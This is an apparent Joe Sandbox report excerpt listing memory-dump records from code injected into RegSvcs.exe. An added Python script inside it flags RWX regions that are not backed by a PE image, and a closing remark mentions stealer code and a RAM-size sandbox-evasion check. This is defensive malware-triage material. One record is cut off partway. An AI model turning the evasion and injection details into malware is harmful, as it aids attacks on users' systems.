                                              • Source File: 0000000D.00000002.4116434515.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_6140000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: fe52eb6b56a5cb77ce7bf120f81f6403558b45463db03e169fd3a81cd526d480
                                              • Instruction ID: 0072ca6480a13a48128ab3dd5603482ea480b8430a87727867279736486026eb
                                              • Opcode Fuzzy Hash: fe52eb6b56a5cb77ce7bf120f81f6403558b45463db03e169fd3a81cd526d480
                                              • Instruction Fuzzy Hash: 4F11E2B1C006599BCB10DF9AC544BDEFBF4BF48320F15816AD818B7250D378A944CFA5
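The "Source File" lines above encode which process and which memory region each disassembled function was lifted from, and every region in this section is 0x40 (PAGE_EXECUTE_READWRITE) with "based on PE: false", which is the signature of unpacked or injected code rather than a mapped image. The script below is an added example, not part of the Joe Sandbox report or product: it parses those records, groups them by process and region, and flags the RWX non-PE-backed regions together with the Windows APIs referenced from them (for the RegSvcs region at 06140000 that is GlobalMemoryStatusEx). The .sdmp field layout (PID.stage.dumpid.base.protection...) is an assumption inferred from the names on this page, cross-checked against the matching hcaresult_<pid>_<stage>_<base>_<process> snapshot names; the protection values are the Win32 PAGE_* constants. The sample input is an excerpt of the records shown above.

```python
"""Triage helper for the 'Memory Dump Source' records of a Joe Sandbox disassembly
section. Added example, not part of the Joe Sandbox report or product.

Assumed .sdmp name layout (inferred from the names on this page, not from Joe
Sandbox documentation): PID.stage.dumpid.base.protection.<3 more fields>.sdmp
PID and base are confirmed by the matching hcaresult_<pid>_<stage>_<base>_<proc>
snapshot names; protection values are the Win32 PAGE_* constants (0x40 = RWX).
"""
import re

PAGE_PROTECTION = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                   0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

SOURCE_RE = re.compile(
    r"Source File:\s*(?P<pid>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\.[0-9A-F.]+\.sdmp,\s*"
    r"Offset:\s*(?P<offset>[0-9A-F]+),\s*based on PE:\s*(?P<pe>true|false)", re.I)
SNAPSHOT_RE = re.compile(r"Snapshot File:\s*hcaresult_\d+_\d+_[0-9a-f]+_(?P<proc>[^.]+)\.jbxd")
# "• LoadLibraryExW.KERNELBASE(00000000,?,...), ref: 0109B28A"  or  "• GlobalMemoryStatusEx.KERNELBASE ref: 0614EA9F"
API_RE = re.compile(r"^[•*-]?\s*(?P<api>\w+)\.(?P<module>\w+)(?:\([^)]*\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)")

# Constructed input: an excerpt of three records from the report above.
SAMPLE = """\
APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0109B079,00000800,00000000,00000000), ref: 0109B28A
Memory Dump Source
• Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
• Snapshot File: hcaresult_9_2_1090000_jDCErdK.jbxd
• Opcode ID: 1b4345065484ff0b7a784736642a9b8171e5d60bef612e16d12c40c10d5f2609
• Instruction Fuzzy Hash: 221120B68003098FDB14CFAAD584ADEFBF4EF48320F14846AD559A7210C379A545CFA4
APIs
• GlobalMemoryStatusEx.KERNELBASE ref: 0614EA9F
Memory Dump Source
• Source File: 0000000D.00000002.4116434515.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
• Snapshot File: hcaresult_13_2_6140000_RegSvcs.jbxd
• Opcode ID: fe52eb6b56a5cb77ce7bf120f81f6403558b45463db03e169fd3a81cd526d480
• Instruction Fuzzy Hash: 4F11E2B1C006599BCB10DF9AC544BDEFBF4BF48320F15816AD818B7250D378A944CFA5
Memory Dump Source
• Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
• Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
• Opcode ID: 45eed6ac58b00d1ccb10af4b9a8d9d4d765f539647f8c1b1c2ccfbffc4074049
• Instruction Fuzzy Hash: 9653F731C10B1A8ACB55EF68C880699F7B1FF99300F55D79AE4587B125EF70AAC4CB81
"""


def parse_records(text):
    """Return one dict per disassembled function, in report order."""
    records, pending_apis, rec = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if rec is None:
            m = API_RE.match(line)
            if m:  # API lines precede the record they belong to
                pending_apis.append((m["api"], m["module"], int(m["ref"], 16)))
                continue
        m = SOURCE_RE.search(line)
        if m:
            rec = {"pid": int(m["pid"], 16), "stage": int(m["stage"], 16),
                   "base": int(m["base"], 16), "protection": int(m["prot"], 16),
                   "pe_backed": m["pe"].lower() == "true", "process": None,
                   "apis": pending_apis}
            pending_apis = []
            continue
        if rec is None:
            continue
        m = SNAPSHOT_RE.search(line)
        if m:
            rec["process"] = m["proc"]
        elif "Instruction Fuzzy Hash:" in line:  # last field of a record: close it
            rec["instruction_fuzzy_hash"] = line.split(":", 1)[1].strip()
            records.append(rec)
            rec = None
    return records


def suspicious_regions(records):
    """Group by (pid, base) and report RWX regions that are not backed by a PE image."""
    regions = {}
    for r in records:
        reg = regions.setdefault((r["pid"], r["base"]), {
            "process": r["process"], "protection": r["protection"],
            "pe_backed": r["pe_backed"], "functions": 0, "apis": set()})
        reg["functions"] += 1
        reg["apis"].update(api for api, _, _ in r["apis"])
    out = []
    for (pid, base), reg in sorted(regions.items(), key=lambda kv: kv[0]):
        if reg["protection"] == 0x40 and not reg["pe_backed"]:
            out.append({"pid": pid, "process": reg["process"], "base": base,
                        "protection": PAGE_PROTECTION.get(reg["protection"], hex(reg["protection"])),
                        "functions": reg["functions"], "apis": sorted(reg["apis"])})
    return out


if __name__ == "__main__":
    for reg in suspicious_regions(parse_records(SAMPLE)):
        print(f"PID {reg['pid']} {reg['process']} base=0x{reg['base']:08X} {reg['protection']} "
              f"not PE-backed, {reg['functions']} function(s), APIs: {', '.join(reg['apis']) or '-'}")
```

Run it over the full disassembly text of a report to get one line per injected or unpacked region with the API set seen in it; a RWX region inside RegSvcs.exe that references GlobalMemoryStatusEx, as here, is worth pulling out of the dump first, since a RAM-size check is a common sandbox test and the decrypted stealer code lives in the same region.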
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Vj
                                              • API String ID: 0-3020623371
                                              • Opcode ID: be1e139b56b502d0e62d8c2f1b958c694a522ed6743bd184b957d7551e848a4b
                                              • Instruction ID: 717a83690c093a85848968aa70f0d5b79f47788cfbd4ecac4465bde432f970f8
                                              • Opcode Fuzzy Hash: be1e139b56b502d0e62d8c2f1b958c694a522ed6743bd184b957d7551e848a4b
                                              • Instruction Fuzzy Hash: 59A14C70E0020ACFDF10CFA8C995BDDBBF1AF58314F18852DE455A7254EB749985CBA1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRkq
                                              • API String ID: 0-1052062081
                                              • Opcode ID: d91535c9810bec3717f9c0e3b44490df1aa0cd83db50130a6d70a590a3add00b
                                              • Instruction ID: 608fbb1b7ff9a3f4a2be4135d09a7c3a728869c8913ca7e40cdc0448b9ec237f
                                              • Opcode Fuzzy Hash: d91535c9810bec3717f9c0e3b44490df1aa0cd83db50130a6d70a590a3add00b
                                              • Instruction Fuzzy Hash: D3613A347142158FCB04DB68D598BAE7BB6EF89700F2444ADE406DB3A2DB75DC41CBA1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRkq
                                              • API String ID: 0-1052062081
                                              • Opcode ID: 17fcf7a379398d2182204c27ce2a05f7123de34d118e37f5101f1ab97d786884
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b8408307d73f767e0c5659018d426c84dc0c1afdffdeb129612ed631814f5738
                                              • Instruction ID: 92f441fde2caef70cc39ea86c73be718ebae24e58b582496bd698db59c851fdc
                                              • Opcode Fuzzy Hash: b8408307d73f767e0c5659018d426c84dc0c1afdffdeb129612ed631814f5738
                                              • Instruction Fuzzy Hash: 01211B38600605CFDB14DB78D958BAD77F1EF89304B10446CE506EB3A5DB369D41DBA0
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cf1c3e270845f1f6dcf40df913d179386a0b8931759dd90cb2cf554baa421d06
                                              • Instruction ID: b4c6aba5c1c9ce9c73f9fdd0166d9c1c6f3c421d9ba0f574e85ccbd0cf525338
                                              • Opcode Fuzzy Hash: cf1c3e270845f1f6dcf40df913d179386a0b8931759dd90cb2cf554baa421d06
                                              • Instruction Fuzzy Hash: 1C119130B01206DBEF24BA78D840B2E7AA5EF45310F28C97DE106DB351DA65DC858BE2
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 15baf4c6152483f08d0bf36b814f744e84cad1ff743fcdfdb48457b860b3f798
                                              • Instruction ID: c873c7a1df393fae355e01d92cd0b24c56770e06b016c4c0314e4e0f8438e27d
                                              • Opcode Fuzzy Hash: 15baf4c6152483f08d0bf36b814f744e84cad1ff743fcdfdb48457b860b3f798
                                              • Instruction Fuzzy Hash: E011E330B05202DBEF256A748850B7E7AA0EF46310F28C93ED146CB252DA74CC858BE2
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eb8fab17c3d3c09a3fb107e779a053db457e09c9caa47c9a921fe885466556e4
                                              • Instruction ID: 3069104f922a8314292607eccade06d37874a63cfdc7efdda4e129162450ce16
                                              • Opcode Fuzzy Hash: eb8fab17c3d3c09a3fb107e779a053db457e09c9caa47c9a921fe885466556e4
                                              • Instruction Fuzzy Hash: 2F015B35A012268BCB25EFB88451AAE7AF5EF49310F24047DE806E7302E735D8818BB1
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4105721986.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_a3d000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                              • Instruction ID: ce156e1fdee7cdac5fa60714368558eba80774ebf846672d2ac100fd72e70e2f
                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                              • Instruction Fuzzy Hash: 1511DD75504280CFCB15CF14E5C4B15FFB1FB84318F28C6AAE84A4B656C33AD84ACB62
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dd5724b3a07f7ad2a8cdcf0dadcdc1742c11fc77a1d734f8ea3d9f66ee6104fe
                                              • Instruction ID: f704da5f4aa214466655f30c4199e62e55722d883a9e7c0c55396712889f0a6a
                                              • Opcode Fuzzy Hash: dd5724b3a07f7ad2a8cdcf0dadcdc1742c11fc77a1d734f8ea3d9f66ee6104fe
                                              • Instruction Fuzzy Hash: A511A531A002058FCB00DF98D98078ABB72FF85311F198579D80C5F29AD774AD49C7A1
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0a53116e101e6d895f685c0e82154369a171fed1940414b53d027670fd38e19d
                                              • Instruction ID: dcc2a5dee6cea0b4f2e03b3ce7d77cee372909c604801a0e88aaa4ce27b5f568
                                              • Opcode Fuzzy Hash: 0a53116e101e6d895f685c0e82154369a171fed1940414b53d027670fd38e19d
                                              • Instruction Fuzzy Hash: 4C0184749011099FDF01FFB8FA4169CBFB2EB41300B0046B9C0059B26AEA349F45DB55
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b69510adf7d3dbe5e42e38d1286fda6253f0e1aac59bd3250c100f23f8fa9515
                                              • Instruction ID: 3832449f28d803b7875b2ae0f74dd2ab97575f863a1efff494a6a0e5dde50c4e
                                              • Opcode Fuzzy Hash: b69510adf7d3dbe5e42e38d1286fda6253f0e1aac59bd3250c100f23f8fa9515
                                              • Instruction Fuzzy Hash: CBF0F67BA04162CBC7228BA48451BACBF70EE9631172900EFD842DB213D321D842C771
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8157033ff1d7fc1639435b57dcbcb20c73706006bcdf0121eb8e5cea0afbc217
                                              • Instruction ID: 2c3d13fbba2f1dd414f93bc412c9eff05de0c9fc91fac75af6b3ff7f47319f5b
                                              • Opcode Fuzzy Hash: 8157033ff1d7fc1639435b57dcbcb20c73706006bcdf0121eb8e5cea0afbc217
                                              • Instruction Fuzzy Hash: C1F0C439B40214CFCB15EB64D598B6C77B2EF88711F2084A8E5069B3B4DB35AD52CF50
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 652867f19174cc911c359e1750c95796e203f25d3d58ed0dd87902f486177fe4
                                              • Instruction ID: 8216abfd6e94553201555e74e25fe11295c901171d6de9ecd7396007f6e6837e
                                              • Opcode Fuzzy Hash: 652867f19174cc911c359e1750c95796e203f25d3d58ed0dd87902f486177fe4
                                              • Instruction Fuzzy Hash: 64F044349011099FDF01FFB8FA4169DBBB6EB40300F5086B9C0059726DEF35AE549B95